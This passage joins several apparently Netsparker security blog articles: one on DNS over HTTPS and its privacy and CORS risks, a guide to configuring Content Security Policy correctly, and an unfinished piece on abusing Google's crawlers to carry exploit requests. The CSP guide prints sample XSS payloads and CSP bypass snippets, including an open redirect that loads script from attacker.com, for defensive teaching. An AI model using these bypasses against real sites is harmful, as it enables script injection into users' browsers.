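To make this concrete, here is a minimal sketch of a DoH lookup using the JSON API (application/dns-json) that providers such as Cloudflare expose. The endpoint and parameter names are taken from their public documentation and should be treated as assumptions to verify, not as part of the I-D itself:

import json
import urllib.request

def doh_lookup(name: str, record_type: str = "A") -> list:
    """Resolve a hostname over DNS over HTTPS using the JSON API."""
    url = f"https://cloudflare-dns.com/dns-query?name={name}&type={record_type}"
    request = urllib.request.Request(url, headers={"Accept": "application/dns-json"})
    with urllib.request.urlopen(request, timeout=10) as response:
        answer = json.loads(response.read().decode("utf-8"))
    # Each answer record carries the resolved data (an IP address for A records).
    return [record["data"] for record in answer.get("Answer", [])]

print(doh_lookup("www.netsparker.com"))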

Is Today's Web Ready for DNS Over HTTPS?

Now that you know some of the important technical details regarding DNS over HTTPS, what about the infrastructure of DoH?

Let's keep in mind that this technology is still in an experimental state and there is a lot of old DNS infrastructure that doesn't support encryption. Could you even deploy DoH when most of the name servers out there don't encrypt their DNS responses? Does DNS over HTTPS even make sense? And wouldn't you need to change how browsers or operating systems work in order to use it?

It turns out that it's not really necessary to update everything. The latest nightly Firefox build added support for DNS over HTTPS; this is a recent, bleeding-edge version that may contain features that aren't yet available in the latest stable version. And Google's Android Pie is going to have a built-in DoH feature.

There is a way to use DoH without an operating system or browser update, though. Obviously, you should keep browsers and operating systems updated, but let me tell you why it will take a long time for most people with an Android phone to use DoH (even though Google added it in Android Pie).

Why You Won't See Native DoH on Your Android Phone for a Long Time

From painful personal experience, I can explain. Some time ago, I bought a new Samsung smartphone. Then Google released a new Android version. The update included a cool UI overhaul and some new features.

Then I waited. Yet month after month, my screen informed me, "Your phone is up to date". This annoying delay was down to the fact that Samsung heavily customizes Android on their own phones. Back then, their version of Android was called TouchWiz and it was full of bloatware. Following complaints, they slowly removed most of the annoying features and software, to the point where people couldn't recognize it as TouchWiz anymore and they had to rename it. (I'm not making this up.) Even though now they have a few fewer Samsung-specific features that they need to adjust to new Android versions, it still takes much too long to get a new update.

A friend of mine had a much older Android device from the same manufacturer and always had the latest Android version installed. That's because he flashed a new CyanogenMod operating system to the phone. It was third-party software that didn't have the TouchWiz UI, but it was the latest Android version that was available. Other problems aside, it's ironic that you could get a fully-patched, up-to-date phone by flashing third party software a few days or weeks after Android published it, yet you needed to wait months for your phone manufacturer to do the same. Obviously, doing that would void your warranty and the average user won't even be aware such a thing is possible. So, even though Android 9 will have DoH support, it may take months or even years for you to be able to use it.

Is There An Alternative Way to Use DoH Even Though Your OS or Browser Doesn't Support It?

There are several options:

  • You can install a DoH proxy on the name server in your local network, which means that your device still sends traditional, unencrypted DNS packets to the local name server. However, that server will query DNS over HTTPS servers on the internet in order to resolve your query, which enables you to use DoH without having to modify your system. Still, it's unencrypted within your local network.
  • It's also possible to install a DoH proxy on your local system, even though I'm not sure if it's possible for Android phones. Using this technique, instead of relying on a second machine in the local network, the proxy runs on the same machine as your browser. Therefore, even if you have an attacker in your local network, he can't read your DNS requests since they are already encrypted once they leave your machine.

Does DNS Over HTTPS Enhance Security and Privacy?

It's up for debate. There are some problems with DoH that are worth a mention. The first of these, due to the way DNS works, is that it's almost impossible to have an end-to-end encrypted connection from your browser to example.com's name server, without making it known to intermediate servers.

Let's recap by looking at how the recursive name server from our earlier example resolves the IP for www.example.com:

  1. It asks one of the internet root servers:
    • Question: "I want to visit www.example.com, do you know where it is?"
    • Answer: "No, but here are the nameservers for .com. Try your luck there!"
  2. Then it asks the .com name servers:
    • Question: "So, can you tell me www.example.com's IP address?"
    • Answer: "You should ask the example.com name servers."
  3. Finally, it asks the example.com name servers:
    • Question: "What is the IP of www.example.com?"
    • Answer: "The IP is 123.123.123.123"

    In each of these queries, the full hostname is sent to the DNS server. All of these servers now know that you want to visit www.example.com, even though this information is only of real interest to example.com's name server – obviously less than ideal in terms of privacy.

    DNS Query Name Minimization

    There is a solution to the problem described above and it's not even a DoH-specific one. It's called DNS Query Name Minimization and this is how it works.

    If you want to visit example.com, the conversation between your recursive name server and the other name servers would look like this:

    1. It would ask the internet root servers:
      • Question: "Do you know the nameservers for .com?"
      • Answer: "Yes, here is their IP address"
    2. Next, it would ask the .com nameservers:
      • Question: "Do you know the nameservers for example.com?"
      • Answer: "Yes, here is the IP address of the example.com nameserver"
    3. Finally, it would ask the example.com nameservers:
      • Question: "Do you know the IP of www.example.com?"
      • Answer: "Yes, it is 123.123.123.123"

    The only name server that knows the full hostname is the one for example.com, since it's also the only server that needs to know it. All the other servers only know a part of the query. This doesn't help you to stay completely anonymous, yet it does reduce the amount of data you give away. This is part of the Firefox DoH implementation and its Trusted Recursive Resolver (TRR) technology.

    There are Some Trust Issues

    The second problem with DoH is threat models. Threat modeling involves identifying potential vulnerabilities and suggesting countermeasures, and it also means ignoring low-level risks. Even though threat models are an important part of information security, I'm usually not a fan, at least when it comes to the average user. Sure, air gapping your PC and placing it behind two layers of bulletproof glass and an electric crocodile pit is a little over the top if you only use your computer for playing spider solitaire. But if you need to decide whether you should enable HTTPS for your homepage or not, you don't really need to spend hours pondering your threat model. It takes less than 15 minutes to set up with Let's Encrypt, so just set it up.

    Unfortunately, TRR is a completely different beast. I don't know the rationale behind Mozilla's decision, but given the huge amount of bandwidth involved and the fact that Mozilla may want to have TRR enabled by default in future versions of Firefox, I assume they wanted to build infrastructure that was both reliable and safe from DDoS attacks. If you think about reliability and DDoS protection, Cloudflare immediately comes to mind. Mozilla partnered up with them and uses their 1.1.1.1 server for the Firefox DoH implementation.

    This causes problems for some people. If you only ever visit Facebook and Twitter, you couldn't care less whether Cloudflare knows about your DNS requests. However, if you are a reporter conducting research for articles and handling sensitive information, you may not want to route all your DNS requests through an American company that could potentially trace them back to you. But there are a few benefits to having an external DoH server. For example, if you are working on an insecure public network, you don't have to communicate with a DNS server in cleartext if you use the encrypted Cloudflare server. Also, the name servers that 1.1.1.1 queries will only see a Cloudflare DNS server asking for the IP that belongs to a given hostname, not your IP.

    How Common is it for Tech Companies to Lose Customer Data?

    The question is, is Cloudflare trustworthy? Well, yes of course it is. And they promise to delete any information they have stored about you within 24 hours. But, mistakes happen.

    • Just this year, Twitter admitted to accidentally storing the plaintext passwords of their users in a log file.
    • Then, German domain registrar DomainFactory unintentionally leaked sensitive user account data, which was retrieved by an attacker. I'd love to report that this was an elaborate hack by a gang of sophisticated attackers, probing the company's website and infrastructure for months with the goal of selling the data. But the vulnerability was painfully simple. It appears that they exposed some error data via an XML feed (why would you do that?!) when a user caused an error in some way and a lot of their sensitive data was leaked via that feed. You may wonder what triggered the error for so many users? The culprit – yet again, I wish I was making this up – was actually an error in the gdpr_policy_accepted field. (If you don't know what GDPR is and why this is ironic on multiple levels, you can get up to speed by reading our Whitepaper: The Road to GDPR Compliance.) They asked the user to acknowledge their data protection policy, but when the user clicked 'Yes', an error occurred and the data that should be protected became readable for everyone. This was because the backend expected a boolean value but got a string instead, triggering an error message that contained user data that ended up in a publicly accessible XML feed. Ouch!

    The bottom line is that people make mistakes – even those that work in the IT departments of large corporations. Even at Cloudflare.

    A Single Point of Failure

    What's also worth mentioning is that even if customer data is secure, there might be outages. If 1.1.1.1 becomes the default DNS server for Firefox and there are any availability issues, not a single Firefox user will be able to issue DNS requests or therefore open a website (assuming they changed no default settings). If you think that outages are impossible, given the vast resources Cloudflare boasts, remember that even AWS had a major outage last year. You may not have noticed the outage just by looking at Amazon's status page, since it relied on AWS (the service that it's supposed to monitor) in order to work correctly and show its status!

    That's why Firefox allows you to use your own Trusted Recursive Resolver. You only have to change the IP in the settings – but how many users know about TRR and how to change it or why? One percent would be a very generous estimate and that's troubling.

    Are DNS Over HTTPS Servers Secure?

    As we've already established, DNS over HTTPS is a very young technology. It's not clear yet which server software will end up being most popular with website administrators. However, if you simply copy Google or Cloudflare's implementation, you could run into an issue – CORS. Let me cite some text from the I-D:

    The integration with HTTP provides a transport suitable for both existing DNS clients and native web applications seeking access to the DNS. Two primary use cases were considered during this protocol's development. They were preventing on-path devices from interfering with DNS operations and allowing web applications to access DNS information via existing browser APIs in a safe way consistent with Cross Origin Resource Sharing (CORS).

    Format of DoH Responses

    Before we talk about CORS, let's think about the format of DoH responses. The I-D describes the application/dns-message media type, which is essentially a raw DNS packet in the HTTP response message. It's useful for most computer programs, as there are already parsers available for that message format. However, the I-D states that it would allow web applications to "access DNS information via existing browser APIs". There is no existing browser API for decoding DNS packets, so that's done on the server side, and Google and Cloudflare can send back a message in JSON format (which, on the other hand, can easily be decoded by a browser).

    However, if your web application that wants to access this data doesn't run on the same host as the DoH server, you encounter a problem. You can't access the data due to the Same Origin Policy (SOP). That's why the Internet Draft mentions CORS. It allows you to access the data anyway, even though the origins don't match.

    But – and let's assume your local server would also have such an API – is that dangerous?

    Well, it can certainly lead to problems in an example where you have set up some custom domains that should only be correctly resolved to the specified IP address from within your network. Let's say your company's website is example.com and you have a special developer.example.com subdomain that should resolve to an internal IP from within the company building. Attackers could trick you into opening a website they control. It would contain JavaScript code that can query your DoH server's API, and try different subdomains and domains. Since it's CORS enabled, attackers could read the response and gain important information about your internal network. They could then use one of the techniques described in our blog post Vulnerable Web Applications on Developers Computers Allow Hackers to Bypass Corporate Firewalls in order to attack it and probe it for weaknesses. That would only work if these DoH servers had a CORS-enabled API as described in the I-D and implemented by Google and Cloudflare.

    How Do You Disable Trusted Recursive Resolver or DNS Over HTTPS in General?

    As you can see, whether TRR/DoH is useful depends on a lot of factors. You need to think about whether you want your DNS requests to be routed through an American company and whether that suits your threat model. There, I said it! On the other hand, it's also not ideal to send all of your DNS requests in plaintext.

    If, ultimately, you decide that TRR or DoH is not right for you, this is how you disable it in its current implementations.

    Firefox

    1. If you want to disable DoH in Firefox, you must be brave, as you have to open about:config and dismiss the scary 'This might void your warranty!' dialog.

    Disable DoH in Firefox

    2. Once you do this, you need to search for network.trr.mode in the search bar. You will be left with exactly one option. You can type various numbers into the field, and even though this goes without saying, 2 activates DoH and 5, obviously, deactivates it. (Zero and 1 would be simpler, but I'm sure it makes sense on some level.)

    Android

    If DoH is enabled by default in Android Pie, there is an easy way to disable it. Reportedly, there is a setting in the Network and Internet Settings menu, called Private DNS. As mentioned in the Android Developers blog, there is a button you need to check that turns it off. Unfortunately, I'm unable to independently verify that claim, simply because my latest Android phone was made by Samsung (which, unsurprisingly, tells me that my phone is up to date). So, even though technology companies do their best to change DNS for the better, some things just never change.

    Is DNS Over HTTPS the Future of DNS?

    In this article, we looked at the technology behind DoH and DNS, as well as the history of the Domain Name System. While DoH may not yet be widespread, it is a good and necessary addition to DNS – if implemented correctly. We established that whether or not you want to route your DNS requests through an American company depends on your personal use of the web. If you don't trust Cloudflare or Google, you can alternatively set up your own DoH resolver, but just beware of vulnerabilities such as the permissive CORS implementation we talked about in this post.


    Negative Impact of Incorrect CSP Implementations


    Content Security Policy (CSP) is an effective client-side security measure designed to prevent vulnerabilities such as Cross-Site Scripting (XSS) and Clickjacking. Following the regular discovery of bypass techniques, a group of researchers led by Google worked to fix these weaknesses in CSP version 3.0. With each new bypass that surfaces, browser developers continue to strengthen CSP.


    However, bypasses aren't the only issue with CSP. Incorrect CSP implementations can also pose critical problems. Keeping in mind that security is not a one-time fix but a process, we're convinced that a significant portion of a secure CSP policy lies in understanding and implementing it correctly.

    Incorrect CSP Implementations

    The Useless CSP website collects examples of websites that have incorrectly implemented CSPs. Let's take a look at some of them.

    Incorrect CSP Implementation on The New Yorker

    In our first example, let's look at the CSP header from the HTTP response of The New Yorker of August 31, 2018:

    Content-Security-Policy: default-src https: data: 'unsafe-inline' 'unsafe-eval';
    child-src https: data: blob:;
    connect-src https: data: blob:;
    font-src https: data:;
    img-src https: blob: data:;
    media-src blob: data: https:;
    object-src https:;
    script-src https: data: blob: 'unsafe-inline' 'unsafe-eval';
    style-src https: 'unsafe-inline';
    block-all-mixed-content;
    upgrade-insecure-requests;
    report-uri
    https://capture.condenastdigital.com/csp/the-new-yorker

    A quick analysis reveals the following:

    • The CSP commands unsafe-inline and unsafe-eval allow inline scripts and scripts from event attributes to execute, something that is highly damaging to the website's client-side security
    • Really, the only good thing about the header above is that it enforces HTTPS

    Incorrect CSP Implementation on Blogger

    Another incorrectly implemented CSP header reported on Useless CSP was found on Google’s blog service, Blogger:

    content-security-policy: script-src   'self' *.google.com *.google-analytics.com 'unsafe-inline'   'unsafe-eval' *.gstatic.com *.googlesyndication.com *.blogger.com   *.googleapis.com uds.googleusercontent.com https://s.ytimg.com https://i18n-cloud.appspot.com   www-onepick-opensocial.googleusercontent.com www-bloggervideo-opensocial.googleusercontent.com www-blogger-opensocial.googleusercontent.com https://www.blogblog.com; 
    report-uri /cspreport

    Yet again, note the unsafe-inline and unsafe-eval keywords, which effectively disable any script execution restrictions that were put in place by the whitelisting of certain websites. This was an eye-watering discovery, considering Google is among the leading companies promoting the development of CSP.

    Conclusions

    • These errors demonstrate the fact that everyone makes mistakes, showing how important it is to use an automated web application security scanner which will detect them for you.
    • It's not always easy to add CSP to an existing website. There are many factors developers need to consider when deciding from where external resources should be loaded. This involves caching, available bandwidth and general performance. Security often ranks low on the list of considerations. In order to effectively implement CSP, you either need to consider it before writing the application (the easiest option) or find a way to add it on top of your existing applications with the tools CSP provides, most notably nonces and hashes.
    • The problem with these examples is the use of the unsafe-inline and unsafe-eval keywords, which removes most of the protection CSP provides against Cross-Site Scripting.

    How to Ensure a Good CSP Setup

    CSP version 3.0 introduced the option to whitelist code blocks using the strict-dynamic directive (covered in detail later in this post). When strict-dynamic is present, CSP 3.0 browsers ignore host whitelists and unsafe options such as unsafe-inline. Another common mistake is whitelisting the data: protocol in the script-src and default-src directives, which lays the grounds for attacks such as the following:

    www.victim.com/index.php?jsfile=data:,alert(1)
    <script src="data:,alert(1);"></script>

    You can find more examples on the Useless CSP website.

    Common Issues in CSP Implementations and Solutions

    An incorrect CSP header implementation not only impacts the security of your website, but can also affect its operation. Websites today rely heavily on third-party sources. These resources are often loaded from the subdomains of the same website (e.g. static.example.com, scripts.example.com).

    The use of inline scripts and JavaScript code in event handlers of HTML elements is quite popular among developers, but that habit isn't really compatible with CSP. A better approach is to move inline code into external script files (for example, on a subdomain) and load it from there. Keep in mind that the host of every external script must be whitelisted in your Content Security Policy, even if you own the subdomain from which the scripts are loaded.

    How To Determine Whether Your CSP Implementation is Problematic

    In practice, there are only three ways to find out whether you’ll have a problem in the implementation of CSP:

    • You could visit every page and check for errors in your browser's developer console
    • You could wait for customers to complain that your site doesn't work correctly
    • You could use the CSP Report-Only mode

    Naturally, we recommend the third option.

    Testing CSP Implementation with the Report-Only CSP Monitoring Mode

    But how does the report-only mode work? Before publishing the CSP headers on your website, you can try them in Report-Only mode. In Report-Only mode, the CSP directives are not enforced. Instead, the browser reports any violations to the endpoint specified in the report-uri attribute. This way, you can find missing directives, the changes you need to implement and the sources you have to whitelist in the CSP header – before you enforce these rules. In addition, it helps you detect inline JavaScript code and styles so you can move them into their respective external files.

    Here is an example:

    Content-Security-Policy-Report-Only: script-src 'self'; report-uri /my_amazing_csp_report_parser;

    This sample script-src directive exclusively whitelists its own origin. All script loadings, inline scripts and script codes in event attributes coming from any other origin will trigger the CSP to send a notification to the end-point specified in the report-uri attribute.
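    The report endpoint itself can be very simple. Below is a minimal PHP sketch of a collector that could sit behind an endpoint like /my_amazing_csp_report_parser (the file and log names are placeholders, not part of any standard):

    <?php
    // csp_report_parser.php – minimal CSP violation report collector (sketch)
    // Browsers POST violation reports as JSON with a top-level "csp-report" key.
    $raw    = file_get_contents('php://input');
    $report = json_decode($raw, true);

    if (isset($report['csp-report'])) {
        // Append one JSON line per violation; in production you would validate,
        // rate-limit and rotate this log.
        file_put_contents(
            __DIR__ . '/csp-violations.log',
            json_encode($report['csp-report']) . PHP_EOL,
            FILE_APPEND | LOCK_EX
        );
    }

    http_response_code(204); // nothing needs to be returned to the browser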

    After the testing is complete and you’re ready to push your CSP commands live, you'll have to disable the Report-Only mode for them to be effective.

    This is what the code would look like:

    Content-Security-Policy: script-src 'self'; report-uri /my_amazing_csp_report_parser;

    Note that even though some CSP directives can be set using HTML's meta tags, when in Report-Only mode you cannot do that and have to use an HTTP response header instead. This screenshot shows how Netsparker reports ineffective Report-Only CSP directives in an HTML meta tag.

    Testing CSP Implementation with the Report-Only CSP Monitoring Mode

    Content Security Policy Directives

    In addition to the CSP header, Content Security Policy has many directives that allow you to configure the security of your websites.

    This table lists and explains the directives that can be used to further limit and define the use of resources.

    Directive: Description
    base-uri: The base HTML element contains the absolute URL that is prepended to all the relative URLs on the page. This directive helps us restrict the URLs that are allowed to be used in the base HTML element, and therefore prevent Base Tag Hijacking attacks.
    child-src: This directive allows us to define which websites are permitted to be loaded in frames located on the page. We can use it as an extra precaution to protect our page from Frame Injection attacks.
    connect-src: This directive restricts the resources that can be loaded via script interfaces such as XHR or WebSockets. This prevents attackers from stealing data from the site.
    font-src: This directive specifies the font sources that can be loaded using @font-face. It is mostly used to prevent attackers from sending extracted data back to their server using the @font-face src directive.
    form-action: This directive specifies the URLs that can be used as targets for form submissions. It can be used as an extra precaution to protect pages from Form Tag Hijacking and Cross-Site Scripting attacks.
    frame-ancestors: This directive specifies the sites that have the authority to load the current page in a frame, iframe, object, embed, or applet tag. It is a substitute for X-Frame-Options, since it can also help prevent Clickjacking and UI Redressing attacks.
    img-src: This directive defines the sources from which images can be loaded.
    media-src: This directive defines or restricts the sources from which video and audio can be loaded.
    object-src: This directive defines or restricts the sources for <object>, <embed>, and <applet> elements, which helps prevent Cross-Site Scripting attacks.
    plugin-types: This directive defines or restricts the plugin types that can be loaded.
    report-uri: This directive specifies the URLs that will receive the report when a CSP directive is violated.
    style-src: This directive defines or restricts the sources for CSS files. This allows you to avoid data exfiltration via CSS.
    upgrade-insecure-requests: This directive converts HTTP requests to HTTPS.

    Examples of How to Use CSP Directives Correctly

    Here are a few examples of how to use CSP directives effectively.

    default-src Directive Example

    By default, these directives are unrestrictive, meaning that if they are not declared in the CSP header, any request will be allowed through. So, if style-src is not set, this will be interpreted as style-src: *, allowing styles from all sources.

    You can use the default-src directive to change this. The specified value will override most directives ending with -src by setting a default value for them. If you set default-src to http://www.example.com, and don’t set a value for font-src, the fonts can only be loaded from http://www.example.com.
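    For example, a policy like the following (a hypothetical policy shown only for illustration) restricts every resource type that has no -src directive of its own to http://www.example.com, while scripts may also be loaded from a CDN:

    Content-Security-Policy: default-src http://www.example.com; script-src http://www.example.com https://cdn.example.net

    Since font-src is not declared, font loading falls back to default-src and is limited to http://www.example.com.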

    However, default-src cannot override these directives:

    • base-uri
    • form-action
    • frame-ancestors
    • plugin-types
    • report-uri
    • sandbox

    This is how Netsparker reminds you that default-src does not affect certain directives.

    default-src Directive Example

    object-src to Block Plugins

    We stated above that CSP is a major client-side security mechanism against various vulnerabilities like XSS. XSS attacks are generally carried out through script execution, so it would seem that limiting script and style sources as a precaution might be the best way to mitigate them. However, there are other HTML elements that can run JavaScript code, such as <embed>, <object> and <applet>.

    This is how Netsparker shows that missing the object-src directive in CSP can lead to XSS.

    object-src to Block Plugins

    You might not want to set default-src, since it's only a fallback mechanism, and for the reasons stated above you'll probably never want to set it to 'none'. However, you might still want to block plugins from loading. In this case you can set object-src to 'none' regardless of what you set for default-src.

    Example:

    Content-Security-Policy: default-src 'self'; object-src 'none';

    This option will block plugins from loading on your webpage.

    The Keywords That Shape the CSP Directives

    Aside from specifying origins from which resources can be loaded, CSP also offers you a few keywords that allow you to further refine your CSP.

    Keyword: Description
    'none': As the name suggests, nothing is allowed to be loaded or embedded. For example, object-src: 'none' means that no objects will be embedded on the page.
    'self': This matches the origin of the current webpage. Resources from other origins, including subdomains, will not be loaded.
    'unsafe-inline': This allows the use of inline JavaScript and CSS.
    'unsafe-eval': This allows the use of text-to-JavaScript functions like eval().

    Setting CSP in Meta Tags

    Even though CSP is mostly used to define the directives in HTTP responses, you can set CSP in meta tags, too. This is ideal for situations in which you can't set HTTP response headers:

    <meta http-equiv="Content-Security-Policy" content="default-src https://cdn.example.net; child-src 'none'; object-src 'none'">

    Unfortunately the following directives cannot be used when setting CSP between meta tags:

    frame-ancestors, sandbox, report-uri

    Setting CSP in Meta Tags

    Getting Around the eval Function

    Use of functions such as eval, new Function(), setTimeout and setInterval with string arguments, which execute text as code within the document context, is blocked by CSP unless unsafe-eval is allowed. To mitigate this, you must make a few changes to the code:

    • If the JSON parsing is carried out using the eval function, you should use the JSON.parse function
    • The strings used in setTimeout or setInterval functions have to be changed to inline functions:

    Instead of:

    setTimeout("document.querySelector('a').style.display = 'none';", 10);

    use:

    setTimeout(() => document.querySelector('a').style.display = 'none', 10);
    • If your template system uses generic functions such as new Function(), you can use a system that supports CSP out-of-the-box, such as Angular. You can also use pre-compilation if your template system supports it.

    You can use the unsafe-eval keyword if you really have to use text-to-Javascript functions like eval. However, be warned that you’ll be creating a huge security gap in the CSP mechanism.

    script-src: 'unsafe-eval'

    Benefits of Reorganizing the Code

    An origin-based restriction mechanism could solve a lot of problems. However, even with such a mechanism in place, there would still be a large gap on the XSS side – inline injection:

    <script>alert(123);</script>
    <a href= onclick="javascript:alert(123)">Click me!</a>
    <img src=1 onerror="alert(1);"/>

    CSP fixes this problem by blocking inline scripts. Not only does CSP block the code found between script tags, but it also blocks scripts in event attributes and javascript: URLs.

    Therefore you should reorganize the code within the script tags as external files on your website. Doing so has a few benefits:

    • Having the external files cached by the browser will improve the website performance
    • The code will be cleaner
    • Since you will need to minify the JavaScript code in order to allow fast loading times, this will also make it slightly harder for attackers to find out what it does and how to exploit it

    If you still insist on using inline Javascript and CSS, you must specify it within the appropriate directives:

    script-src: 'unsafe-inline'; style-src: 'unsafe-inline'

    Should You Use nonce or hash in the Whitelist?

    When using CSP to whitelist script or style sources, you’re not limited to origin-based whitelisting the safe resources. You can also use nonce or hash functions to whitelist code blocks.

    Let's assume you have a code block like the one below:

    <script nonce=EDNnf03nceIOfn39fn3e9h3sdfa>
     //Some inline code I can't remove yet, but need to ASAP.
    </script>

    Content-Security-Policy: script-src 'nonce-EDNnf03nceIOfn39fn3e9h3sdfa'

    You can whitelist the entire code block with a nonce value. As a security measure, a new nonce value has to be generated for each request; it cannot be reused and it has to be long and random.
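    A minimal sketch of per-request nonce generation in PHP could look like this (the header value and inline script are illustrative only):

    <?php
    // Generate a fresh, unpredictable nonce for every response.
    $nonce = base64_encode(random_bytes(16));

    header("Content-Security-Policy: script-src 'nonce-$nonce'");
    ?>
    <script nonce="<?php echo htmlspecialchars($nonce); ?>">
    // Inline code whitelisted only for this single response.
    console.log('nonce-protected inline script');
    </script>

    Because the nonce changes with every response, an attacker who injects markup into the page cannot predict a valid value.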

    Alternatively, instead of a nonce attribute, you can compute a hash of the script's contents and whitelist that hash in the respective header.

    <script>
    alert('Hello, world.');
    </script>

    Content-Security-Policy: script-src 'sha256-qznLcsROx4GACP2dm0UCKCzCG+HiZ1guq6ZZDob/Tng='

    CSP supports SHA256, SHA384, and SHA512 hash algorithms.
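    The hash value is simply the base64-encoded SHA-256 (or SHA-384/SHA-512) digest of the exact inline code. A quick PHP sketch to compute one (the script string is just an example):

    <?php
    // Compute a CSP hash source for a given inline script body.
    $script = "alert('Hello, world.');";
    $hash   = base64_encode(hash('sha256', $script, true)); // raw digest, then base64
    echo "script-src 'sha256-" . $hash . "'";

    Note that the digest must match the inline content byte for byte, so any extra whitespace or newlines between the script tags change the resulting hash.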

    Deprecated CSP Directives

    Like any other technology, CSP has developed over time and some parts of it have been deprecated. You should know that the X-Content-Security-Policy and X-WebKit-CSP headers are deprecated; use the Content-Security-Policy header instead.

    Summary of a Research on CSP 3.0

    A few years ago, researchers from Google released CSP is Dead, Long Live CSP, a risk analysis report on frequently used CSP headers. The research was one of the most comprehensive of its kind, covering 1,687,000 hostnames and 26,000 CSP HTTP headers. It also analyzed the three popular methods used to bypass CSP. These are Open Redirection, Insecure JSONP Endpoint, and AngularJS CSP Compatibility Mode.

    Insecure Endpoint Vulnerabilities Due to Loose CSP Configuration

    The report stated that 14 out of the 15 domains most commonly whitelisted for script loading host insecure endpoints, and that attacks targeting them can effectively neutralize the CSP policy.

    Here are a few examples of the famous CSP bypassing methods listed in the research.

    Bypassing CSP path restrictions:

    Open Redirection:

    Content-Security-Policy: script-src example.org partially-trusted.org/foo/bar.js

    // Allows loading of untrusted resources via:
    <script src="//example.org?redirect=partially-trusted.org/evil/script.js">

    XSS CSP whitelist bypasses

    Insecure JSONP Endpoint

    <script src="//example.org/api/jsonp?callback=evil"></script>

    AngularJS CSP Compatibility Mode

    <script src="angular.js"></script>

    <div ng-app>{{ executeEvilCodeInUnsafeSandbox() }} </div>

    Using Nonce-based CSP for Dynamically Loaded Scripts

    Google suggests taking control of CSP policies by using nonce-based policies with strict-dynamic for dynamically loaded scripts, instead of whitelist-based policies. Google added support for the strict-dynamic keyword to its own browser in order to implement the policy it recommends to users. Let's take a closer look at how this method works.

    Say you load a script from example.com/map.js, so you specify a CSP for it:

    Content-Security-Policy: script-src example.com;

    You trust example.com, but you also use the unsafe-inline keyword so that the objects your scripts load into the DOM don't get stuck at the CSP barrier – a small concession for you, but a big advantage for attackers.

    Content-Security-Policy: script-src example.com 'unsafe-inline';

    In addition, by whitelisting the entire example.com domain, we cracked the door open for CSP bypasses through various endpoints on example.com. Now let's assume that there's an open redirect on example.com (note that the example below only works in older browsers):

    example.com/redirectme.php?go=http://attacker.com/bad.js

    If you used nonce-based CSP instead, you would’ve gotten rid of any potential attack vector:

    Content-Security-Policy: script-src 'nonce-random-123' 'strict-dynamic';

    <script src="http://example.com/map.js" nonce=random-123></script>

    The above only trusts the script from example.com/map.js by assigning a nonce value to the code block where the script is loaded. By using strict-dynamic, you allow DOM manipulations to be made from this block and even allow scripts to be loaded by the whitelisted JavaScript code. By doing so, you didn’t have to whitelist the entire example.com domain nor use unsafe-inline or unsafe-eval for the loading of dynamic resources, which protects your website from various attacks.

    Backward Compatibility with Earlier Versions of Content Security Policy

    The attribute nonce has been supported since CSP 2.0, and strict-dynamic was introduced in CSP 3.0. So what should you do if the user’s browser does not support CSP 2.0 and you’re using nonce? One option is to use the unsafe-inline directive alongside nonce as a backward compatibility method, as shown:

    Content-Security-Policy: script-src 'nonce-B92E8649B6CF4886241A3E0825BD36A262B24933' 'unsafe-inline'
    <script nonce="B92E8649B6CF4886241A3E0825BD36A262B24933">
    console.log("code works");
    </script>

    When nonce is present, the unsafe-inline command is ignored by the browser. So in browsers that support CSP 2.0 and above, the unsafe-inline command will not be taken into consideration. In browsers where nonce isn’t supported (CSP 1.0), unsafe-inline will be put to work and your page will continue functioning. The backward compatibility implementation for strict-dynamic is as follows:

    Content-Security-Policy: script-src 'nonce-B0A48531D5C5EB3F8503430E6D75C83E23B7AE36' 'strict-dynamic' https: http:

    With the use of strict-dynamic, the browsers that support CSP 3.0 and above will also ignore the https: and http: commands.

    Conclusion

    Content Security Policy is an extensive security measure. With the release of new versions and the discovery of new attack patterns, CSP keeps evolving. Independent research reveals the dangers of an incorrectly implemented CSP header, so implementing it correctly is crucial to ensure both the safety and the functionality of our websites. This is why we recommend that you scan your web application with the Netsparker web security solution, which checks your CSP configuration and alerts you if it detects an unsafe implementation.

    Authors, Netsparker Security Researchers:

    Ziyahan Albeniz
    Umran Yildirimkaya
    Sven Morgenroth

    Using Google Bots as an Attack Vector


    According to statistics, Google consistently holds a market share of more than 90% among search engines, and many users use their browser's address bar as Google's search bar. Being visible on Google is therefore crucial for websites, as it continues to dominate the market.

    Using Google Bots as an Attack Vector

    In this article, we analyze a study from F5 Labs which brings our attention to a new attack vector using Google's crawling servers, also known as Google Bots. These servers gather content from the web to create the searchable index of websites from which Google's Search engine results are taken.

    How Search Engines Use Bots to Index Websites

    Each search engine has unique sets of algorithms, but the common thing they do is to visit any given website, look at the content and links they find (known as 'crawling'), then grade and list the resources. After one of these bots finds your website, it will visit and index it.

    For a good ranking, you need to make sure that search engine bots can crawl your website without issues. Google specifically recommends that you avoid blocking search bots in order to achieve successful indexing. Attackers are aware of these permissions and have developed an interesting technique to exploit them – Abusing Google Bots.

    The Discovery of a Google Bot Attack

    In 2001, Michal Zalewski wrote about this trick in Phrack magazine and highlighted how difficult it is to prevent. Just how difficult became apparent 17 years later, when F5 Labs inspected the CroniX crypto miner. When F5 Labs' researchers analyzed some malicious requests they had logged, they discovered that the requests originated from Google Bots.

    Initially, the F5 Labs researchers assumed that an attacker used the Google Bot's User-Agent header value. But when they investigated the source of the requests, they discovered that the requests were indeed sent from Google.

    There were different explanations for why Google servers would send these malicious requests. One was that Google's servers had been hacked, but that idea was quickly discarded as unlikely. Instead, the researchers focused on the scenario laid out by Michal Zalewski, in which Google Bots are abused into behaving maliciously.

    How Did the Google Bots Turn Evil?

    Let’s take a look at how attackers can abuse Google Bots in order to use them as a tool for malicious intent.

    First, let's suppose that your website contains the following link:

    <a href="http://victim-address.com/exploit-payload">malicious link</a>

    When Google Bots encounter this URL, they’ll visit it in order to index it. The request that includes the payload will be made by a Google Bot. This image illustrates what happens:

    Using Google Bots as an attack vector diagram

    The Experiment Conducted to Prove the Attack

    Researchers verified the theory that a Google Bot request would carry the payload by conducting an experiment in which they prepared two websites: one that acted as the attacker, and one that acted as the target. Links carrying the payload and pointing at the target website were added to the attacker's website.

    Once the researchers had set the configuration needed for the Google Bots to crawl the attacker's website, they waited for the requests. When they analyzed them, they found that the requests from the Google Bot servers indeed carried the payload.

    The Limits of the Attack

    This scenario is only possible in GET requests where the payload can be sent through the URL. Another drawback is that the attacker won't be able to read the victim server's response, which means that this attack is only practical if it's possible to send the response out of bounds, like with a command injection or an SQL injection.

    The Combination of Apache Struts Remote Code Evaluation CVE-2018-11776 and Google Bots

